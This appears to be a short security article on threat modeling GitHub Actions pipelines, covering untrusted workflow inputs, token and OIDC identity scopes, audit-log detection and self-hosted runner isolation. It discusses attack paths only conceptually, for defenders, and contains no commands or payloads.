CI/CD security: How to secure your GitHub ecosystem
GitHub Actions has become infrastructure, and like all infrastructure, it needs a threat model. Most teams approach CI/CD security reactively—patching after incidents or applying generic hardening checklists. Detection-based threat modeling flips this: you map your actual attack surface first, then build detections and controls around the paths that matter.
Start with inputs. Every workflow trigger is an attack vector. Pull request events are the obvious one—an external contributor opens a PR that triggers a workflow with access to secrets. But workflow_dispatch with user-supplied inputs is equally dangerous. I've seen teams allow arbitrary Docker image tags as inputs, essentially handing attackers a command injection primitive. The same applies to issue comments that trigger workflows, repository dispatch events, and even schedule triggers if an attacker can modify the cron expression through a previous compromise.
The key is mapping which inputs flow into sensitive operations. Does a PR title get interpolated into a bash script? Does a branch name end up in a docker build command? These aren't hypothetical—script injection through unvalidated inputs remains the most common GitHub Actions vulnerability. Your threat model should explicitly document every workflow that takes external input and what that input can reach.
Identities matter more than most teams realize. The GITHUB_TOKEN has different permission scopes depending on workflow context. A workflow triggered by a pull_request event from a fork gets a read-only token by default, but pull_request_target runs in the context of the base repository with write permissions. This distinction is critical. I've audited organizations where developers used pull_request_target to access secrets for integration tests, not realizing they'd just given external contributors write access to their repository.
OIDC federation adds another identity layer. When your workflows authenticate to AWS or GCP using OIDC, the cloud provider trusts claims in the GitHub JWT. If you're not validating the sub claim properly, an attacker who compromises any workflow in your organization can assume roles meant for production deployments. Your threat model needs to map which workflows can assume which roles and what blast radius exists if a workflow is compromised.
Detection comes next. You can't prevent every attack, but you can detect anomalies. Monitor for workflows that suddenly start accessing new secrets, workflows that run longer than their historical baseline, or workflows that make API calls to unexpected endpoints. GitHub's audit log is underutilized here—it captures workflow runs, token usage, and permission changes. Feed this into your SIEM and alert on deviations.
Self-hosted runners deserve special attention. They're persistent compute with access to your network, often running with excessive permissions. If an attacker can get code execution in a workflow on a self-hosted runner, they've pivoted into your infrastructure. Your threat model should treat self-hosted runners as trusted network boundaries and scope their access accordingly. Use ephemeral runners when possible, and if you must use persistent ones, isolate them per team or sensitivity level.
The practical outcome of this approach is a prioritized list of detections and mitigations. Not every risk needs immediate fixing, but you should know which workflows can access production, which can exfiltrate secrets, and which can modify your supply chain. That knowledge lets you focus hardening efforts where they actually matter.